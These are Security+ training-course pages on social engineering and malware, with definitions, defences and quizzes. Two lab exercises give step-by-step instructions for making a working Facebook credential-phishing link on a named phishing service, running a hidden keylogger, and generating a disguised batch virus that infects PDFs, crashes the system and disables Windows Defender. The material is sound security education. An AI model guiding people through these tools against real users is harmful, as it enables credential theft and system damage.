Here are few of the principles that social engineers use to manipulate users. Any given attack might be built
on two or three or more.

Authority Attackers might try to project authority by imitating a government agency or an important
person in a company. People tend to hand over information if they believe the attacker is a
legitimate authority, even if company policy restricts it.
Intimidation Some attacks attempt to scare the victim into compliance. This can be used in combination
with impersonating authority, for instance, if the attacker pretends to be a senior executive
who is angry and impatient for information.
Consensus People are more likely to be taken in by a scam if it seems that other people think it's
legitimate. Conversely, in the case of a hoax, a user is more likely to panic for no reason if
others are, too.
Scarcity The attacker plays on the users fear of missing out on something good, trying to push then into
making a hasty decision. This might be the offer of limited product deals if the user would
only click a link or provide some information.
Urgency The attacker tries to create a sense of urgency, again trying to push the user to a decision
without thinking too much about it. Scarcity makes use of urgency, as does the implication
that there will be consequences if the user doesn’t act. "I have a sales presentation in ten
minutes, and I really need those files now!"
Familiarity People are far more likely to have their guard down with people they know and/or like. A
social engineer after a valuable target might actually take time to become friends with an
employee with security privileges. It's no surprise if the employee then trusts that new friend
enough to answer questions or grant favors that are technically against policy.
Trust Some people are very trusting. They just aren't expecting someone to try to fool them with
kindness and open lies. Ultimately, most social engineering techniques come down to the user
believing what the attacker is saying, even if it's a threat.

CompTIA Security+ Exam SY0-501 53


Chapter 2: Understanding attacks / Module B: Social engineering

Impersonation
Impersonation is a powerful technique, especially in large organizations or those with frequent guests and
visitors. Consider the story of con man turned security consultant Frank Abagnale—you might better know
him as Leonardo DiCaprio's character from Catch Me If You Can, but he's a real person who built a criminal
career largely around impersonating others. While the movie, and maybe even his autobiography, is a
fictionalized and dramatized account of his exploits, it's full of examples of plausible impersonation attacks.

Exam Objective: CompTIA SY0-501 1.2.1.6


Early in his career, Abagnale acquired a Pan Am pilot's uniform and a fake ID, and used that to impersonate a
real pilot. While he didn't try to endanger people by flying planes unlicensed, over the course of a few years
his trick allowed him to take hundreds of free flights and find food and lodging around the world, all at
company expense. Other times he impersonated doctors, security guards, or even just took on inconsequential
aliases as part of banking fraud schemes. Any of these schemes could have been discovered quickly through
stricter security policies; as it was, he was arrested more than once. Even more often, he rapidly left a scam
when someone got suspicious. But for the most part, it didn't take long for him succeed in an attack, even
when the damage was just stealing a free ride.
This sort of approach can work in a lot of businesses. In an office building with little overt security an obvious
stranger poking around might get some suspicion, but the right clothes, a purposeful stride, and what looks
like an ID badge at a glimpse will make the same people assume the unfamiliar person belongs there. Even if
there's a receptionist's desk or outright security checkpoint on the way back the hall, some combination of a
delivery uniform, fake ID, and good cover story, could get an attacker right past it. For that matter, "I'm from
IT" is one of the most potent lies you can tell to get access in many office buildings. A fake service technician
might even get someone to unlock the telecommunications closet, and get a private room to centrally access
the network from.
It doesn't stop at physical access either: much of what impersonators do is talk to people and get them to
divulge information or give access to services and resources. An employee asking for a password change, a
manager from another department demanding to "borrow" something, or a city official needing to review
company documents all could be attackers trying to trick you. Not all social engineering attacks are centered
around impersonation, but it's a key element to most of them.
Impersonation is especially dangerous over the phone. A voice conversation makes it harder to verify identity,
or to spot suspicious visual clues such as body language. While you might imagine people would be less
likely to give up sensitive information over the phone than in person, it's not always the case. Help desk
workers and other customer-facing employees are especially vulnerable to this, since they're trained to be
friendly and helpful but might not be trained about what not to reveal.

Phishing
Electronic communications like email, instant messaging, or social media sites allow whole new avenues for
impersonation and other social engineering attacks. One of the most popular is phishing, so named because
the attacker casts out "bait" in the form of official-looking messages requesting a response, and then catches
whoever takes the offer. The archetypical phishing attack is an email apparently from someone needing help,
or a business that you're a customer of, with a return address or website link for you to reach them. In truth,
it's just an attacker trying to steal information from you, or even infect your computer with malware.

Exam Objective: CompTIA SY0-501 1.2.1.1, 1.2.1.2, 1.2.1.3, 1.2.1.4


Phishing attacks can take many forms, and some can be pretty sophisticated. While most people today now
understand that there aren't any Nigerian princes looking to share their fortunes in exchange for a cash
advance, those have answered such advance-fee or 419 scams often are pulled into ever-increasing
correspondence with the scammer, and conned out of more and more money. Some have even been tricked
into overseas trips where they were kidnapped for ransom, or even murdered. More commonly, you might
receive an official looking email claiming to be from your bank or a major web commerce site with a fake
link to their website. You might be able to tell just looking at the link that something is wrong. For a harmless

54 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module B: Social engineering

example, http://nbc.com.co/ is a parody news site with a domain name chosen to be easily mistaken
for the television network site http://nbc.com/. If you look you can tell something is odd, but if you
just glance and click you might be fooled.

Phishing attacks often claim to be from banks

Even once you click the attacker's link and go to the site, there's more to the attack. It might be nothing more
than a shoddy fake site with ads and malware links. On the other hand, it could be a carefully crafted
facsimile of the actual website expecting you to supply your user information. Some even use complex scripts
or other application attacks to change the browser address bar or even trick browsers designed to detect
fraudulent secure websites. In fact, just the fact that you responded at all shows them your email address is
valid and that you're reading it, on top of any other information you send.
Phishing isn't limited to email. The same principles work for other text-based electronic communication like
IM or SMS, and social media sites today are filled with fraudulent user accounts that will try to befriend or
connect with you in order to launch a later attack. Even on an online video game you're likely to encounter
some malicious user impersonating a moderator or administrator and demanding information from you.
Some phishing variants are known by their own names.

CompTIA Security+ Exam SY0-501 55


Chapter 2: Understanding attacks / Module B: Social engineering

Spear Typical phishing attacks are sent blindly to a large mailing list in hopes that someone will
phishing respond. In contrast, spear phishing targets a specific person or group of people, with content
tailored to them—most commonly employees or customers of a specific company. A message
claiming to be from an actual person in HR or customer service, even fraudulently, is more
likely to get a response than a cold request to random people. It's even more convincing when it
contains other personal or professional information the attacker was able to learn. Carefully
targeted spear phishing by well-informed attackers is an increasingly common and very
effective attack.
Whaling An even more targeted type of spear phishing singles out high profile and high value targets,
such as senior executives—whales instead of fish, in other words. The attacker researches the
target to gain personal and business information, then forges a message that looks to be
legitimate high-level correspondence: a legal subpoena, a complaint from a major client, or
something else that can't just be delegated. Successful whaling attacks can be very damaging:
the attacker might gain high level company secrets, executives' personal credentials, or even
remote access to their computers.
Vishing Voice phishing applies the techniques and goals of phishing to voice calls, especially those
using voice over IP systems such as Skype or Vonage. Compared to ordinary telephone service,
these make it easier to present false user information, bypass casual caller ID or tracing
features, and otherwise obscure or falsify the attacker's identity. Once the call's made, it's like a
phishing email or traditional telephone scam: the attacker in false identity tries to get you to
give up sensitive information.

URL hijacking
Apart from phishing, misleading URLs can also be used to directly target browser users who mistype a
website's name in the address bar, or visit a legitimate website that has typographical errors in its links. In a
technique called URL hijacking or typo squatting, a dishonest actor registers a domain name with a very
similar name to a popular site. When users mistakenly visit the squatter's site, they might be redirected to a
competitor, encounter nothing but ads or pornography, or even be subjected to malware or browser attacks.

Exam Objective: CompTIA SY0-501 1.2.2.17.1, 1.2.2.17.3, 1.2.2.17.4


URL hijacking can take a lot of different forms: the typo squatter might register a domain name with an easy
misspelling of the legitimate site's, or one with the proper domain but a different top-level domain. For
instance, a typo squatter targeting http://comptia.org/ might register http://comtia.org/ or
http://comptia.com/.

 From 1997 until 2004, visiting whitehouse.com (as opposed to the US government site
whitehouse.gov) would direct you to a pornography site. Since then it's been used for real estate,
video hosting, and other purposes, none of which are actually related to the White House most users
expect.
 Despite Google's best efforts, goggle.com has taken advantage of user errors for ten years: in the
past it was a malware site, though today it's "only" a surveying scam.
 Celebrity names are also very popular for typo squatting. Especially if the celebrity doesn't quickly
register their own name, it might become a squatter's site. Even in a political campaign, something like
candidatename.com might end up redirecting to an opposing site.

It can be difficult for website owners to do anything about typo squatters, since unless the domain name or
site content actually infringe on trademarks there might be little legal recourse. The best technique is
preemptive: companies or people worried about the problem often register variant names or other top-level
domains, and set them to forward to the main site.

56 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module B: Social engineering

In a related attack called clickjacking, a malicious page might hide hidden clickable content under seemingly
normal content elements, so users clicking on them perform unwanted actions such as sharing important
information with the attacker. Users might be directed to that page by phishing or typo squatting, or the web
server itself might be compromised.
As a user, you have even less direct power over the problem. All you can really do to avoid being taken in by
URL hijacking is to avoid typing site names in manually, do it carefully when you must, and leave quickly if
anything seems strange about the site.

Spam and hoaxes


Phishing is the most dangerous form of social engineering by email, but it's not the only one. Close behind it
is the use of email to send malware as attachments. The attachment is framed as a document, an image, or
even a game, but actually opening it reveals a virus or Trojan horse that compromises the computer. Email
client features or malware scanners can potentially a malicious attachment, but that's no guarantee especially
if the recipient is determined to open it. Malware attachments might even be sent from a friend or coworker's
PC that's been infected, making it more likely the recipient will trust it.

Exam Objective: CompTIA SY0-501 1.2.1.9


The most common unwanted message on any electronic medium is spam. Literally trillions of unsolicited
messages are sent every year via email, instant messaging, forums, games, social media sites, fax machines,
and almost other vector you can think of. Sometimes spam on a specific medium has its own term, such as
spim for spam sent by instant message or spit for spam sent by VoIP, but for most users "spam" means any
sort of unwanted content. Phishing and malware transmission can technically be classified as spam, but the
most common use is unsolicited commercial advertisement. Whether the products being sold are genuine or
fraudulent, such unwanted spam wastes network resources and more importantly the time of employees who
have to sort through their inboxes and decide what messages are important and what are just noise.
Other messages are hoaxes, false stories and misinformation either directly spread by an attacker or prankster,
or just forwarded on by users who were fooled by the hoax and want to notify their friends and coworkers.
Hoaxes today are most common on social media, but you can find them almost everywhere. Some are
relatively harmless, if you don't count the time half the office spends discussing the sudden death of a
(perfectly healthy) celebrity, or how Facebook is about to start charging a monthly fee. Others might suggest
that recipients take action on the hoax, often in ways that could compromise security or do other harm. If
employees start microwaving their phones to recharge the batteries, or, more likely, deleting a vital operating
system file because someone said it was a virus, a hoax can do real damage.

CompTIA Security+ Exam SY0-501 57


Chapter 2: Understanding attacks / Module B: Social engineering

Physical intrusion by social engineering


Most social engineering attacks rely on human interaction to get people to divulge information or share
resources directly. Other times, impersonation or otherwise blending in is just a tool to get physical access to
where the attacker can steal something, access unprotected information, or spy on people. There are a number
of common techniques.

Exam Objective: CompTIA SY0-501 1.2.1.5, 1.2.1.7, 1.2.1.8

Shoulder surfing Watching someone who is viewing or entering sensitive information, or eavesdropping
on confidential conversations. It's easy to think of this as being literally over the
shoulder, but people have been caught using binoculars or hidden cameras to steal
passwords or ATM PINs. Shoulder surfing is especially a danger for employees doing
work-related communications on mobile devices in public places, but it's a risk
whenever guests or visitors are in the office, or when a malicious employee wants to
learn something from a coworker with access he or she lacks.
Tailgating / Getting into a secure area by tagging along right behind someone who has legitimate
Piggybacking access, with or without their knowledge. A tailgater might join a crowd of authorized
people that aren't individually checked, strike up some small talk with people to distract
them from noticing they're letting an unauthorized visitor in, or even get a careless but
polite person to hold a locked door open after entering. Tailgating might involve some
verbal trickery, but it's mostly about blending in to get past physical security; it works
very well in places that are securely locked or even guarded, but are busy enough to
make employees careless about who's coming and going.
Dumpster diving Literally digging in the target's trash, hunting for discarded documents and other media.
The most obvious target is confidential information that's valuable in itself, or security-
related information that can be used to compromise the system, but it's not all that's
valuable. Routine documents like schedules, policy manuals, contact lists, and personal
information or correspondence that don't have direct value to an attacker, and are much
less likely to be securely disposed of, can be used to launch additional social
engineering attacks. In itself, dumpster diving isn't social engineering, but it's
frequently prelude to it, and if the trash isn't literally out by the street the attacker might
use impersonation to get there.

Defending against social engineering


Social engineering isn't very much different than software exploits like malware and application attacks, in
that it attacks vulnerabilities in a faulty system. The difference is that the system it exploits is human minds
and behavior, and those haven't really gotten any intrinsic security upgrades over the last several thousand
years. The closest you can get is user education, training employees to be aware of social engineering attacks
in order to not be fooled. You can also use policy, physical, or technical controls that make the attacks less
likely to succeed, but since so much of social engineering is convincing people to break policies and bypass
controls, that's harder than it sounds.
A safe posture against social engineering isn't easy even when you know what to look for. Not only do you
have to be suspicious and smart, you have to maintain both during the longest, busiest, or slowest days.
Through it all, you have to remain polite and understanding enough that you don't hurt relationships with
honest employees, customers, or authorities. Some principles are valuable against social engineering in
general, regardless of specific organizational policies.
 Learn what information should and should not be shared with the general public. The more sensitive it
is, the more important it becomes to get positive identification and a good reason to share it. This
includes both what you tell people and what you leave in visible places.

58 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module B: Social engineering

 Don't share passwords and credentials under any circumstances. If someone legitimately needs
information only you can access, you need to log in and do it yourself.
 Don't break security policies just because someone has a sympathetic story. If you can't verify that
someone has permission for you to help them, know how to quickly escalate the problem to a
supervisor or appropriate party, and clearly communicate the reasons why you can't just help directly.
 Learn to recognize suspicious behavior by both outside personnel and established employees: searching
or loitering in inappropriate places, lacking proper ID, asking strange or surprising questions or favors,
and so on.
 Learn what requests, such as password information, won't be made by email, and don't carelessly
follow links or advice from email or other electronic sources. If you must, learn how to tell when a link
or site is suspicious.

Policies are likewise vital in protecting against social engineers. Not only should policies explicitly codify
good awareness practices and training procedures, they should place layers of defense between employees
and the ability or temptation to innocently "help out" an attacker.
 Use least privilege and need to know policies that restrict employee permissions to also restrict their
ability to leak information.
 Enforce clean desk policies to keep sensitive information out of view.
 Require employees to log off or lock workstations or other devices to avoid someone sneaking on
without a password.
 Avoid dumpster diving by shredding or otherwise destroying sensitive documents on disposal.
 Define incident reporting and handling procedures to make sure that unusual user or guest behaviors
are discovered and acted on. Reporting should be easy, and user awareness should be reinforced and
rewarded.

Technical controls are important against social engineering, even when they only reduce the opportunity for
human error. While general techniques like physical security, system hardening, and strong passwords are
invaluable, a few others are helpful against specific attack types.
 Mantraps preventing multiple people from passing a security checkpoint at once discourage tailgating.
 Spam filters and antimalware can minimize the danger of spam and malicious attachments.
 Network and browser controls can recognize and block phishing links.
 Security cameras, alarm systems, and system logging can catch intruders in ways they can't talk their
way past, even if the detection is after the fact.

Discussion: Social engineering


1. What social engineering attacks have you encountered, in the workplace or your personal life?
Answers may vary, but almost everyone's encountered phishing email and casual scams of some sort.
2. What barriers would keep a smooth-talking person from just walking into your business and making off
with valuable equipment or data?
Answers may vary.
3. How could you better secure your workplace against social engineering?
Answers may vary, but could include technical controls, increased surveillance, or user education.

CompTIA Security+ Exam SY0-501 59


Chapter 2: Understanding attacks / Module B: Social engineering

Exercise: Examining phishing attacks


You can perform this activity in any browser with internet access, but it's safest to do so in the Windows 7
VM. You'll create a phishing email designed to steal a user's password. It would be illegal to send it to
someone, so you'll just see how it works yourself.
Do This How & Why

1. In your web browser, navigate to


http://z-shadow.co

2. Sign up for the site with an email If you don't want to register with a normal email address, you
address. can enter an account somewhere like
https://mailinator.com without logging in.

3. Create a phishing link. This site is just one way an attacker with limited technical
knowledge can still steal passwords.

a) Scroll down the page. There are links for a variety of popular social media sites,
games, email services, and even PayPal. You'll create a
Facebook link.

b) Next to the Facebook link, click A URL pops up.


English.

c) Copy the link. Select the text and press Ctrl+C. (Other methods might not
be reliable.)

4. Try the phishing link.

60 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module B: Social engineering

Do This How & Why

a) Paste the link into a new browser tab.


It looks like a valid Facebook login page, and it even shows the site and URL as verified, but it will
actually redirect your input to the attacker's site.

b) Enter a fake email and password, Note: Don't enter your real info.
then click Log In.
You're redirected to an invalid website.

5. Check the results of your attempt. It may take a few minutes for the user name and password you
entered to appear.

a) Refresh the Z-Shadow page.

b) Click My Victims.

The fake user name and password you entered appears. A real
attacker could use this same site to steal passwords from your
coworkers.

CompTIA Security+ Exam SY0-501 61


Chapter 2: Understanding attacks / Module B: Social engineering

Assessment: Social engineering


1. What kind of attack is most likely when you're doing sensitive work on your laptop at a coffee shop?
Choose the best response.
 Piggybacking
 Dumpster diving
 Shoulder surfing
 Smurfing

2. Impersonation is a core element to most social engineering attacks. True or false?


 True
 False

3. Several coworkers in the sales department received email claiming to be from you. Each message was
personally addressed, and contained a link to a "test site" and a request to log in with normal user
credentials. You never sent it, and on examination the supposed test site is a phishing scam. Just what
variant of phishing is this? Choose the best response.
 Pharming
 Spear phishing
 Vishing
 Whaling

4. What security controls can protect against tailgating? Choose all that apply.
 Alarm systems
 Clean desk policy
 Mantraps
 Security guards
 Spam filters

5. Social engineering attacks are most commonly either in person or over electronic media rather than on the
phone. True or false?
 True
 False

62 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module C: Malware

Module C: Malware
One of the most common and obvious security threats is malicious software installed on computers. You
might hear of viruses, worms, Trojan horses, spyware, adware, rootkits, or any number of other threats that
can get on your system. Collectively called malware, they are easy to encounter and can range from mildly
annoying to extremely damaging. Despite long and ever-increasing efforts to combat it, malware is still one of
the greatest threats to host security.
You will learn:
 About malware varieties
 How malware spreads
 How malware damages infected systems
 How malware avoids detection

Malware vectors
Malware can be seen as a problem on individual systems, but it commonly spreads through networks, and can
compromise network security. You'll often see the terms "virus", "worm", and "Trojan horse" used
interchangeably to describe malware, but it's important not to confuse them. While all three exploit security
vulnerabilities to infect systems, each uses a different vector and different vulnerabilities. They're not the only
vectors used, either; today there are several ways that malware can spread.

Exam Objective: CompTIA SY0-501 1.1.1, 1.1.4, 1.1.5, 1.1.12, .1.2.1.10

Virus Attaches malicious code to another file, which both can do direct damage and also spread
itself to other running programs. Viruses themselves can be categorized according to
exactly what they infect to spread.
 Program viruses infect executable files, and are activated when you run the
program.
 Boot sector viruses infect the boot sector of a drive, and are activated when you
start the computer or access the drive.
 Macro viruses and script viruses infect data files used by applications with built-in
scripting languages, such as Microsoft Office. They are activated when you open
the file.
 Multipartite viruses can spread multiple ways and infect multiple types of files.

Regardless of type, generally viruses rely on human action to launch: someone has to run
the application, open the document, or insert the infected media. In addition to any other
harm it does, the typical virus replicates by infecting other files once it's running. Often an
active virus will remain resident in memory, even when the infected application that
installed it is no longer running. Early on, executable viruses were the most common sort:
this is much of why the word "virus" might commonly be used even when another term is
technically more accurate for a specific threat.

CompTIA Security+ Exam SY0-501 63


Chapter 2: Understanding attacks / Module C: Malware

Worm Replicates itself by exploiting system vulnerabilities. A worm might infect application
files, but once it's running it can spread through the network unassisted, exploiting
vulnerable protocols or services. For example, before Service Pack 2 was released for
Windows XP, the operating system had no firewall and a highly vulnerable service
targeted by many worms, so just connecting to the internet could infect a PC in moments
without any other human action. Today, they include browser attacks that can infect your
system even if you don't knowingly download or run executable files. Because of how
they spread, worms are typically considered network attacks as well as malware.
Trojan Masquerades as a harmless or useful program, such as a game or even an antivirus
application. Like the wooden Trojan horse from the Greek myth, once a victim "takes it
inside" and runs the program, its malicious functions take over. Frequently the program
will work, or appear to work, just as outwardly advertised, while the harmful functions
either remain invisible to the user or just don't surface until later. As well as being
malware, Trojans are social engineering attacks relying on human trust to spread. They
often overlap with viruses or worms as well: an email attachment from a friend might be a
virus, while a phishing link on social media could direct you to malware servers that will
infect you through your browser.
Logic bomb Malicious code that lies dormant until a specific condition is met, such as a trigger date or
particular system activities. A logic bomb can spread as a virus, worm, or Trojan horse,
but it's especially popular for inside attackers with privileged access, such as disgruntled
employees. The most famous logic bomb was one of the first recorded: a programmer at
an insurance firm put code in the system that would be triggered if he was fired. Two
years later, when he was terminated for behavioral reasons, the logic bomb went off and
deleted thousands of payroll records. Related to logic bombs are easter eggs, which are
also hidden code that lies dormant until triggered, but usually is benign. For example, an
easter egg might give a joke response to certain unlikely input.
Watering hole A newer sort of two-stage attack, where an attacker specifically infects a website or cloud
service used and trusted by a group or category of users who are the actual target. When
those users come to the "watering hole" they're infected through browser vulnerabilities or
by downloading infected files. This method can be particularly effective with users who
apply strict security settings and behaviors to unfamiliar sites, but let their technical or
behavioral guard down in trusted locations. Sophisticated watering hole attacks targeting
members of specific organizations in order to affect enterprise systems are just one
example of how malware threat vectors are evolving to meet increasing network security.

Malware payloads
The payload of any malware defines the malicious actions it takes, and the effects it has. Malware effects can
range from slowdowns and minor annoyances to data breaches, system failure, or even physical damage.
Even malware without any payload at all can do harm. The first significant worm, called the Morris worm,
supposedly wasn't designed to do damage at all, but to measure the size of the late-1980s internet. The
problem was that it replicated itself so often, and used so many resources, that it rendered thousands of
servers inoperative until they were repaired, and required the then-defenseless internet to be partitioned and
cleaned of the worm piece by piece.

Exam Objective: CompTIA SY0-501 1.1.2, 1.1.3, 1.1.7, 1.1.8, 1.1.9, 1.1.10, 1.1.11, 1.1.13
Some payloads do fairly generic sorts of damage, whether the extent is mild or extreme. They consume
system resources, introduce instability, delete or corrupt data, or maybe just display messages on the screen.
They might also disable antivirus software or other security controls in spreading or preventing detection,
making the system more vulnerable to other malware. Other payloads have specific effects notable enough
that they can be used to describe the malware itself.

64 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module C: Malware

Backdoor In general, a backdoor is any hidden way into a system or application that
bypasses normal authentication systems. Originally it meant when a programmer,
for malicious or legitimate troubleshooting reasons, included a secret access
method in the design process. In the case of malware, it refers to a payload that
creates such a backdoor when it infects the system, allowing attackers to exploit it
later. For example, a remote access trojan (RAT) is a trojan that invisibly installs a
remote access program an attacker can later use to access your computer.
Backdoors can be used to gather data, remotely control the computer, send spam
email, or almost anything the computer itself can.
Botnet Some backdoors are designed to let large numbers of computers be centrally
controlled, usually by the malware's creator, to achieve a common goal. The
resulting networks are called botnets, and the individual infected systems are
called zombies. The botnet's controller can direct zombies to send email, make
distributed denial-of-service attacks, gather information, or even perform
distributed computing tasks like Bitcoin mining, all without the knowledge of the
actual system owners. Many of today's large-scale network attacks and spam
operations are conducted by zombie hordes numbering in the thousands or
millions.
Ransomware Some malware, especially distributed by trojan horses, attempts to extort money
from the victim in order to undo or prevent further damage. Sometimes the
ransom itself is still disguised as a legitimate service, such as a bogus "free
antivirus" program claiming it's detected an infection but you need the paid
version to actually remove it. Others are more straightforward, like crypto-
malware that encrypts personal or entire drives, then demands payment for the
decryption key. Ransomware can employ many creative approaches, and is
growing in popularity and sophistication.
Spyware Any backdoor can potentially give access to sensitive data on the infected system,
but spyware is specifically designed to gather information about user and
computer activities to send to other parties. Spyware can be used to track browser
activity, redirect browser traffic, steal financial or user account information, or
even as a keylogger tracking all user input. Sometimes tracking cookies used by
web browsers are classified as spyware, though they tend to be more limited in
capability.
Adware Malware that delivers advertisements to the infected system, either as pop-ups or
within browser or other application windows. Adware frequently has a spyware
component, even if it's just to track user activities and choose targeted ads.

Any given piece of malware might have more than one effect, and beyond that a given infected system can
have multiple malware infestations. Not only do many forms of malware compromise security and allow
additional infections, insecure user behaviors leading to one infection often lead to many in a row, until the
computer is unusable.

Note: Many of these effects aren't strictly limited to malware. Free software is often supported by
onscreen ads, software or services might track user activity for varying reasons, legitimate distributed
computing programs can resemble botnets, and backdoors can be used for troubleshooting or system
recovery purposes. As long as these features and how they'll be used are openly and honestly presented,
the software technically isn't malware. From a security perspective it might not matter: even if the
program behavior is legally and ethically sound, you should consider if it compromises overall system
security before installing it.

CompTIA Security+ Exam SY0-501 65


Chapter 2: Understanding attacks / Module C: Malware

How malware hides


Malware can spread easily through undefended systems, and linger a long time unseen if its payload isn't
visibly damaging. Antivirus software can easily detect and remove common infections, and applications with
strong heuristic analysis features can even recognize unknown malware by reverse engineering it or just
recognizing functional similarities to known threats. While this is a big help, malware designers responded in
turn by designing malware to hide from security software, or even to attack and disable it.

Exam Objective: CompTIA SY0-501 1.1.6


Malware vs. antimalware has become a complex arms race, each side using increasingly sophisticated
methods to use the upper hand. Many of the details are very technical, but there are a few common techniques
malware uses to evade detection.

Polymorphic malware Malware including a polymorphic engine that changes its code whenever it
spreads. Usually involving some elements of encryption and randomization, the
changes alter the malware's signature to complicate detection, but don't actually
change how the code functions.
Stealth malware Stealth viruses contain features to hide their effects from antimalware
applications. They carefully mask the modifications they make to the system,
move themselves to different file system or memory locations in order to evade
detection, or even intercept operating system calls to fool other applications into
thinking everything is working normally. Some stealth malware anchors itself so
firmly into the system that it can only be reliably detected by running antimalware
from clean media like a bootable CD. Stealth malware that attacks antimalware
applications or signatures to avoid detection is called a retrovirus.
Rootkit Named for early versions that allowed administrative "root" access to Unix-like
operating systems, rootkits later developed stealth features designed to hide them
from detection. Modern rootkits compromise boot systems and core operating
system functions to gain high-level access that can hide them from most detection
methods. They can even infect device firmware, requiring specialized equipment
to remove or rendering the device permanently unusable. Rootkits and similar
features have even been used in commercial software: even if there's no malicious
intent from the vendor, they can compromise security other ways.

Removing well-defended malware can be a challenge. You might need to use multiple scanning and cleaning
applications, or even specialized removal tools designed for a specific piece of malware. With particularly
persistent or newly discovered attacks, the only option might be a clean reinstall of the system.

Compromised software and firmware


It's easy to think of malware as being something you're infected with from outside, and even a trojan horse
being something you only get when you carelessly download files from sketchy-looking websites, but it's
entirely possible to have a compromised system even when you've got a "clean install" of all your business-
critical software. Even apart from some critical software vulnerability or misconfiguration, there are a few
ways this could happen. Most involve either inside attackers within your organization or that of a vendor, or
else very sophisticated attacks by a state actor or highly-organized criminal group.

Exam Objective: CompTIA SY0-501 1.1.6, 1.2.2.18, 3.3.1.6


First, applications and even operating systems you install might be deliberately misconfigured or programmed
with backdoors and logic bombs. The risk is especially high in anything developed or customized specifically
for your organization, since it won't have other eyes on it aside from you like a more general-purpose
commercial or open-source project would Even access to source code might miss some attacks. A skilled
coder can refactor, or rearrange, malicious code in ways that obfuscate its real purpose from other
programmers who don't know what to look for.

66 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module C: Malware

Drivers can also be compromised. While it's most dangerous when you download them from third-party sites,
manipulated drivers have been packaged on official download sites or even pre-printed CD-ROMs in the past.
One way to compromise a driver is to insert a programming shim that intercepts information passing between
the hardware and the operating system. Attached to some device like a storage device, network adapter, or
keyboard this could be used to harvest any sort of input and output for an attacker.
You can't even necessarily trust hardware appliances that come with factory-installed firmware, since it's
possible for a sufficiently motivated attacker with access to your supply chain to modify it. For example, a
few years ago, documents and photos were published showing NSA modification of routers and other network
equipment being shipped overseas. The NSA teams redirected equipment to secret locations, installed custom
firmware with surveillance trojan horses on it, and then sent it to its unsuspecting buyers.
Most organizations don't really have to worry about state level actors sabotaging their networks, much less
have the resources to detect and stop it. All the same, if your security needs are strict enough you can't afford
to simply trust that software is clean just because it's fresh out of the box.

Defending against malware


Protecting against malware isn't a simple task, especially when you might encounter zero-day malware that
even security experts don't know about yet. There are a number of specific techniques you should use in
combination to minimize malware exposure and limit damage.

 Ensure that all hardware and software is legitimately sourced and unaltered.
• Only download software from verified, vendor-approved sources.
• Where possible, check downloaded software against cryptographic hashes of its original contents.
• Use signed drivers and/or applications.
• Perform code review of custom software before deploying it.
• Make sure equipment has not been modified from its factory configuration.
 Ensure that all systems have antimalware software with real-time monitoring installed and kept up to
date.
• There are a wide variety of antivirus applications, free and commercial, with different feature sets and
capabilities. Research which best suits your organization's needs.
• The version of Windows Defender included with Windows 8 and newer includes antivirus support.
Earlier versions of Windows include a version of Windows Defender that protects against spyware but
not other forms of malware, so you'll still need another application.
• You should only run one antivirus application with real-time scanning on a given system, but you
might increase detection chances by having additional applications from other vendors for manual or
scheduled scans.
 Regulating system permissions can make it less likely for systems to become infected in the first place.
• Restricting user permissions can make it more difficult for users to install trojan horses, or for viruses
to gain the access they need to spread.
• Restricting use of removable media prevents malware from spreading on flash drives or similar
vectors. Even if such devices aren't blocked entirely, disabling auto-run features can reduce risk.
• Regularly check systems for unexpected installed applications or running processes.
 Regularly install security patches for operating systems and applications, especially browsers and their
add-ons. Frequently they are designed to fix exploits used by malware.

CompTIA Security+ Exam SY0-501 67


Chapter 2: Understanding attacks / Module C: Malware

 Network security features can protect against malware.


• Firewalls can block the spread of worms.
• IDS and network-based antimalware can detect malware transmission.
• Spam filters can recognize harmful email attachments.
• Network monitoring software can help to spot unusual traffic caused by worms or botnets.
 Acceptable use policies and user education are among the most important tools in reducing malware
risk.
• Users should be aware of the risks of visiting unknown sites and downloading or installing untrusted
software.
• Users should be shown how to recognize phishing links and suspicious attachments.
• Unknown removable media should not be used. Flash drives are so cheap today that an attacker might
"lose" one where a valuable target might find it and wonder what's on it.
• Security software should only be disabled for a known and trusted purpose, and then only for as long
as absolutely necessary.

Exercise: Examining malware


For this exercise, you'll need to use the Windows 7 VM.

WARNING: Actually running the virus at the end of this exercise will disable the VM permanently, and
you will need to reinstall it from a new copy.
In this activity you'll use a keylogger and create a virus.
Do This How & Why

1. In the Windows 7 VM, install Ultimate


Keylogger.

a) In the Tools folder on the desktop, This application secretly logs all user activity, very much like
double-click ultimatekeylogger. keyloggers spread by trojans and viruses. At the same time,
this particular one isn't intended as malware, and won't spread
to other systems on its own.

b) Follow the onscreen prompts to The application opens and a welcome window pops up.
install the application.

c) Click OK. You're prompted to enter a password.

d) Enter a simple password in both


boxes and click OK twice.

2. Configure the keylogger to secretly


log all activity.

a) In the Monitoring Options section,


set the screenshot interval to 10
seconds.

68 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module C: Malware

Do This How & Why

b) In the Banner section, clear Show This will make the keylogger invisible to users, just like a
icon in the system notification malicious one would be.
area.

c) Click Apply.

d) On the top left side, click Start If necessary.


Monitoring.

e) Close the application. It looks like it's closed entirely, but the keylogger is still
running.

3. Browse to a website and try to log in Such as Facebook.


using fake credentials.

4. Open Ultimate Keylogger again to


view activity.

a) Press Ctrl+Alt+Shift+S. You're prompted to enter the password.

b) Enter your password and click OK. Click I Agree to close the Evaluation Version window.

c) On the upper left, click Stop


Monitoring.

d) Click View Report.

The report opens in your browser, containing screenshots and


logged keyboard input.

5. Close all open windows. Next you'll create a simple virus.

6. Launch DELmE's Batch Virus It's in the Tools folder on the desktop. You'll need to click OK
Generator. to agree with the license terms.

7. Design a virus. This application lets you create a batch-based virus. On the left
is the virus name and content. On the right are three tabs you
can use to make the virus more powerful.

CompTIA Security+ Exam SY0-501 69


Chapter 2: Understanding attacks / Module C: Malware

Do This How & Why

a) In the Virus name field, type a "Funny screen saver", for example.
suitably innocent name.

b) On the Infection tab, click Infect


All .pdf files.

c) On the Payload tab, click Crash


Computer

d) On the Other Options tab, click


Disable Win Defender.

e) Add other virus options if you like.

8. Click Save As .Bat and choose a The default file name is the one you chose.
folder.

9. In Windows Explorer, navigate to the Don't actually run the file unless you're willing to restore the
file. VM from a backup.

10. Close all open windows.

70 CompTIA Security+ Exam SY0-501


